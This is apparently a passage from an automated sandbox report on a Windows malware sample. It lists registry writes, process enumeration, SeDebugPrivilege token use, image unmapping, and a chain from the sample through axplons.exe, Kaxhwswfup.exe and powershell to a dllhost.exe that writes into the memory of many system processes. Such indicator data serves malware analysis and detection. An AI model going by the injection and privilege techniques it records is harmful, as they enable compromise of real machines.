100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad01320000000000ae5846bc2000343862633762303665613833323263643661663831643661343530386633333733623962386238313362633939386436613232346365616265313363396639610000b20009000400efbeae5846bcae5846bc2e000000000000000000000000000000000000000000000000009c589300340038006200630037006200300036006500610038003300320032006300640036006100660038003100640036006100340035003000380066003300330037003300620039006200380062003800310033006200630039003900380064003600610032003200340063006500610062006500310033006300390066003900610000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea0000001800000003000000cac0217e1000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c34386263376230366561383332326364366166383164366134353038663333373362396238623831336263393938643661323234636561626531336339663961000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a05800000000000000726861747165647100000000000000008e69c4ea1508f64e82bc7922d9c9b2b0f04f0e3dcd03ef118fd7f24b122c28858e69c4ea1508f64e82bc7922d9c9b2b0f04f0e3dcd03ef118fd7f24b122c2885d2000000090000a08d00000031535053e28a5846bc4c3843bbfc139326986dce7100000004000000001f0000002f00000053002d0031002d0035002d00320031002d0033003900300036003200380037003000320030002d0032003900310035003400370034003600300038002d0031003700350035003600310037003700380037002d00310030003000300000000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d00000068000000004800000019be7eb9000000000000d01200000000000000000000000000000000	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\5b9a1e40-892d-4bfe = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy"	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\9d2d30d4-6f50-4cf7	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\5147724a-d64c-4c4c = "\\\\?\\Volume{B97EBE19-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\48bc7b06ea8322cd6af81d6a4508f3373b9b8b813bc998d6a224ceabe13c9f9a"	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\572812a8-5ef2-4894	RuntimeBroker.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\0eea387b-03eb-4687 = 1641ba3957a6da01	RuntimeBroker.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\fac1525a-0e18-42ee = b75ec43957a6da01	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\85b342c9-489a-45ce = "8324"	RuntimeBroker.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\9d2d30d4-6f50-4cf7 = ee4f133957a6da01	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\9d2d30d4-6f50-4cf7 = "8324"	RuntimeBroker.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\7bc0db86-e38a-4d17 = 0114020000000000c0000000000000464c0000000114020000000000c0000000000000468300000020000000710e413957a6da01e67f943957a6da01e67f943957a6da01e25606000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad01320000000000ae5846bc2000646233653261306466616364396334336537363336666564626462343665363566393061376532393064346534306661393766323863653832653335663664640000b20009000400efbeae5846bcae5846bc2e00000000000000000000000000000000000000000000000000736aa600640062003300650032006100300064006600610063006400390063003400330065003700360033003600660065006400620064006200340036006500360035006600390030006100370065003200390030006400340065003400300066006100390037006600320038006300650038003200650033003500660036006400640000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea0000001800000003000000cac0217e1000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c64623365326130646661636439633433653736333666656462646234366536356639306137653239306434653430666139376632386365383265333566366464000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a05800000000000000726861747165647100000000000000008e69c4ea1508f64e82bc7922d9c9b2b0ed4f0e3dcd03ef118fd7f24b122c28858e69c4ea1508f64e82bc7922d9c9b2b0ed4f0e3dcd03ef118fd7f24b122c2885d2000000090000a08d00000031535053e28a5846bc4c3843bbfc139326986dce7100000004000000001f0000002f00000053002d0031002d0035002d00320031002d0033003900300036003200380037003000320030002d0032003900310035003400370034003600300038002d0031003700350035003600310037003700380037002d00310030003000300000000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d00000068000000004800000019be7eb9000000000000d01200000000000000000000000000000000	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\a7fb56a0-d3bf-4b8c	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\e11eeeb7-8ced-457a = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy"	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\fac1525a-0e18-42ee = "\\\\?\\Volume{B97EBE19-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\6c2e94ca6e5e1623f26b6ed0943f5fd3da7d5aa44703003f51decf8a377497ab"	RuntimeBroker.exe
Key deleted	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\a7fb56a0-d3bf-4b8c	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\9d2d30d4-6f50-4cf7	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\e11eeeb7-8ced-457a = "8324"	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\bbf80a94-1643-4b45 = "8324"	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\7bc0db86-e38a-4d17 = "0"	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\a7fb56a0-d3bf-4b8c = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy"	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\a7fb56a0-d3bf-4b8c = "\\\\?\\Volume{B97EBE19-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\6c2e94ca6e5e1623f26b6ed0943f5fd3da7d5aa44703003f51decf8a377497ab"	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\5147724a-d64c-4c4c = "8324"	RuntimeBroker.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\85b342c9-489a-45ce = 0114020000000000c0000000000000464c0000000114020000000000c00000000000004683000000200000003e0d603957a6da010209bd3957a6da010209bd3957a6da016a220a000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad01320000000000ae5846bc2000336362366130316133643836393132363939376135396165633363373732306537326230336637373864613161643633333739376539383666303963616239640000b20009000400efbeae5846bcae5846bc2e000000000000000000000000000000000000000000000000001d318c00330063006200360061003000310061003300640038003600390031003200360039003900370061003500390061006500630033006300370037003200300065003700320062003000330066003700370038006400610031006100640036003300330037003900370065003900380036006600300039006300610062003900640000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea0000001800000003000000cac0217e1000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c33636236613031613364383639313236393937613539616563336337373230653732623033663737386461316164363333373937653938366630396361623964000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a05800000000000000726861747165647100000000000000008e69c4ea1508f64e82bc7922d9c9b2b0f14f0e3dcd03ef118fd7f24b122c28858e69c4ea1508f64e82bc7922d9c9b2b0f14f0e3dcd03ef118fd7f24b122c2885d2000000090000a08d00000031535053e28a5846bc4c3843bbfc139326986dce7100000004000000001f0000002f00000053002d0031002d0035002d00320031002d0033003900300036003200380037003000320030002d0032003900310035003400370034003600300038002d0031003700350035003600310037003700380037002d00310030003000300000000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d00000068000000004800000019be7eb9000000000000d01200000000000000000000000000000000	RuntimeBroker.exe
Key deleted	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\572812a8-5ef2-4894	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\fac1525a-0e18-42ee	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\5b9a1e40-892d-4bfe	RuntimeBroker.exe
Key deleted	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\9d2d30d4-6f50-4cf7	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\3b762e73-b0bd-4ea6 = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy"	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\3b762e73-b0bd-4ea6 = "\\\\?\\Volume{B97EBE19-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\db3e2a0dfacd9c43e7636fedbdb46e65f90a7e290d4e40fa97f28ce82e35f6dd"	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\3b762e73-b0bd-4ea6 = "0"	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\0eea387b-03eb-4687 = "0"	RuntimeBroker.exe
Key deleted	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\bbf80a94-1643-4b45	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\7bc0db86-e38a-4d17 = "8324"	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\5147724a-d64c-4c4c	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\7bc0db86-e38a-4d17 = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy"	RuntimeBroker.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2156	dd069dfe70a747f96f917a19386a9bd9e7fa1021ab84060cfb99ca7e390ddcd4.exe
2156	dd069dfe70a747f96f917a19386a9bd9e7fa1021ab84060cfb99ca7e390ddcd4.exe
4292	axplons.exe
4292	axplons.exe
4720	axplons.exe
4720	axplons.exe
4084	powershell.EXE
4084	powershell.EXE
4084	powershell.EXE
4820	dllhost.exe
4820	dllhost.exe
4820	dllhost.exe
4820	dllhost.exe
4820	dllhost.exe
4820	dllhost.exe
4820	dllhost.exe
4820	dllhost.exe
4820	dllhost.exe
4820	dllhost.exe
4820	dllhost.exe
4820	dllhost.exe
4820	dllhost.exe
4820	dllhost.exe
4820	dllhost.exe
4820	dllhost.exe
4820	dllhost.exe
4820	dllhost.exe
4820	dllhost.exe
4820	dllhost.exe
4820	dllhost.exe
4820	dllhost.exe
4820	dllhost.exe
4820	dllhost.exe
4820	dllhost.exe
4820	dllhost.exe
4820	dllhost.exe
4820	dllhost.exe
4820	dllhost.exe
4820	dllhost.exe
2856	Kaxhwswfup.exe
4820	dllhost.exe
4820	dllhost.exe
4820	dllhost.exe
4820	dllhost.exe
4820	dllhost.exe
4820	dllhost.exe
4820	dllhost.exe
4820	dllhost.exe
3212	WerFault.exe
3212	WerFault.exe
4820	dllhost.exe
4820	dllhost.exe
4356	svchost.exe
4356	svchost.exe
4820	dllhost.exe
4820	dllhost.exe
4820	dllhost.exe
4820	dllhost.exe
4820	dllhost.exe
4820	dllhost.exe
4820	dllhost.exe
4820	dllhost.exe
4820	dllhost.exe
4820	dllhost.exe

Suspicious use of AdjustPrivilegeToken 29 IoCs

description	pid	Process
Token: SeDebugPrivilege	2856	Kaxhwswfup.exe
Token: SeDebugPrivilege	4084	powershell.EXE
Token: SeDebugPrivilege	4084	powershell.EXE
Token: SeDebugPrivilege	4820	dllhost.exe
Token: SeShutdownPrivilege	332	dwm.exe
Token: SeCreatePagefilePrivilege	332	dwm.exe
Token: SeShutdownPrivilege	4740	mousocoreworker.exe
Token: SeCreatePagefilePrivilege	4740	mousocoreworker.exe
Token: SeShutdownPrivilege	4740	mousocoreworker.exe
Token: SeCreatePagefilePrivilege	4740	mousocoreworker.exe
Token: SeShutdownPrivilege	3908	RuntimeBroker.exe
Token: SeDebugPrivilege	2856	Kaxhwswfup.exe
Token: SeRestorePrivilege	3212	WerFault.exe
Token: SeBackupPrivilege	3212	WerFault.exe
Token: SeBackupPrivilege	3212	WerFault.exe
Token: SeShutdownPrivilege	3440	Explorer.EXE
Token: SeCreatePagefilePrivilege	3440	Explorer.EXE
Token: SeShutdownPrivilege	4740	mousocoreworker.exe
Token: SeCreatePagefilePrivilege	4740	mousocoreworker.exe
Token: SeShutdownPrivilege	4740	mousocoreworker.exe
Token: SeCreatePagefilePrivilege	4740	mousocoreworker.exe
Token: SeShutdownPrivilege	3908	RuntimeBroker.exe
Token: SeShutdownPrivilege	4740	mousocoreworker.exe
Token: SeCreatePagefilePrivilege	4740	mousocoreworker.exe
Token: SeShutdownPrivilege	4740	mousocoreworker.exe
Token: SeCreatePagefilePrivilege	4740	mousocoreworker.exe
Token: SeShutdownPrivilege	3908	RuntimeBroker.exe
Token: SeShutdownPrivilege	332	dwm.exe
Token: SeCreatePagefilePrivilege	332	dwm.exe

Suspicious use of UnmapMainImage 1 IoCs

pid	Process
3440	Explorer.EXE

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2156 wrote to memory of 4292	2156	dd069dfe70a747f96f917a19386a9bd9e7fa1021ab84060cfb99ca7e390ddcd4.exe	86
PID 2156 wrote to memory of 4292	2156	dd069dfe70a747f96f917a19386a9bd9e7fa1021ab84060cfb99ca7e390ddcd4.exe	86
PID 2156 wrote to memory of 4292	2156	dd069dfe70a747f96f917a19386a9bd9e7fa1021ab84060cfb99ca7e390ddcd4.exe	86
PID 4292 wrote to memory of 2856	4292	axplons.exe	100
PID 4292 wrote to memory of 2856	4292	axplons.exe	100
PID 4292 wrote to memory of 2856	4292	axplons.exe	100
PID 2856 wrote to memory of 4784	2856	Kaxhwswfup.exe	105
PID 2856 wrote to memory of 4784	2856	Kaxhwswfup.exe	105
PID 2856 wrote to memory of 4784	2856	Kaxhwswfup.exe	105
PID 2856 wrote to memory of 4784	2856	Kaxhwswfup.exe	105
PID 2856 wrote to memory of 4784	2856	Kaxhwswfup.exe	105
PID 2856 wrote to memory of 4784	2856	Kaxhwswfup.exe	105
PID 2856 wrote to memory of 4784	2856	Kaxhwswfup.exe	105
PID 2856 wrote to memory of 4784	2856	Kaxhwswfup.exe	105
PID 2856 wrote to memory of 4784	2856	Kaxhwswfup.exe	105
PID 4084 wrote to memory of 4820	4084	powershell.EXE	108
PID 4084 wrote to memory of 4820	4084	powershell.EXE	108
PID 4084 wrote to memory of 4820	4084	powershell.EXE	108
PID 4084 wrote to memory of 4820	4084	powershell.EXE	108
PID 4084 wrote to memory of 4820	4084	powershell.EXE	108
PID 4084 wrote to memory of 4820	4084	powershell.EXE	108
PID 4084 wrote to memory of 4820	4084	powershell.EXE	108
PID 4084 wrote to memory of 4820	4084	powershell.EXE	108
PID 4820 wrote to memory of 624	4820	dllhost.exe	5
PID 4820 wrote to memory of 672	4820	dllhost.exe	7
PID 4820 wrote to memory of 960	4820	dllhost.exe	12
PID 4820 wrote to memory of 332	4820	dllhost.exe	13
PID 4820 wrote to memory of 428	4820	dllhost.exe	14
PID 4820 wrote to memory of 1036	4820	dllhost.exe	15
PID 4820 wrote to memory of 1060	4820	dllhost.exe	17
PID 4820 wrote to memory of 1104	4820	dllhost.exe	18
PID 4820 wrote to memory of 1216	4820	dllhost.exe	19
PID 4820 wrote to memory of 1228	4820	dllhost.exe	20
PID 4820 wrote to memory of 1288	4820	dllhost.exe	21
PID 4820 wrote to memory of 1328	4820	dllhost.exe	22
PID 4820 wrote to memory of 1368	4820	dllhost.exe	23
PID 4820 wrote to memory of 1428	4820	dllhost.exe	24
PID 4820 wrote to memory of 1492	4820	dllhost.exe	25
PID 4820 wrote to memory of 1500	4820	dllhost.exe	26
PID 4820 wrote to memory of 1544	4820	dllhost.exe	27
PID 4820 wrote to memory of 1664	4820	dllhost.exe	28
PID 4820 wrote to memory of 1712	4820	dllhost.exe	29
PID 4820 wrote to memory of 1752	4820	dllhost.exe	30
PID 4820 wrote to memory of 1820	4820	dllhost.exe	31
PID 4820 wrote to memory of 1828	4820	dllhost.exe	32
PID 4820 wrote to memory of 1972	4820	dllhost.exe	33
PID 4820 wrote to memory of 1984	4820	dllhost.exe	34
PID 4820 wrote to memory of 1472	4820	dllhost.exe	35
PID 4820 wrote to memory of 1620	4820	dllhost.exe	36
PID 4820 wrote to memory of 2088	4820	dllhost.exe	37
PID 4820 wrote to memory of 2100	4820	dllhost.exe	38
PID 4820 wrote to memory of 2216	4820	dllhost.exe	40
PID 4820 wrote to memory of 2336	4820	dllhost.exe	41
PID 4820 wrote to memory of 2516	4820	dllhost.exe	42
PID 4820 wrote to memory of 2524	4820	dllhost.exe	43
PID 4820 wrote to memory of 2656	4820	dllhost.exe	44
PID 4820 wrote to memory of 2668	4820	dllhost.exe	45
PID 4820 wrote to memory of 2712	4820	dllhost.exe	46
PID 4820 wrote to memory of 2780	4820	dllhost.exe	47
PID 4820 wrote to memory of 2796	4820	dllhost.exe	48
PID 4820 wrote to memory of 2824	4820	dllhost.exe	49
PID 4820 wrote to memory of 2832	4820	dllhost.exe	50
PID 4820 wrote to memory of 2960	4820	dllhost.exe	51
PID 4820 wrote to memory of 2968	4820	dllhost.exe	52

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:624
- C:\Windows\system32\dwm.exe
  "dwm.exe"
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:332
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{dcd36ac1-35d5-4e0e-b8f9-726877e42cc7}
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4820

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
PID:672

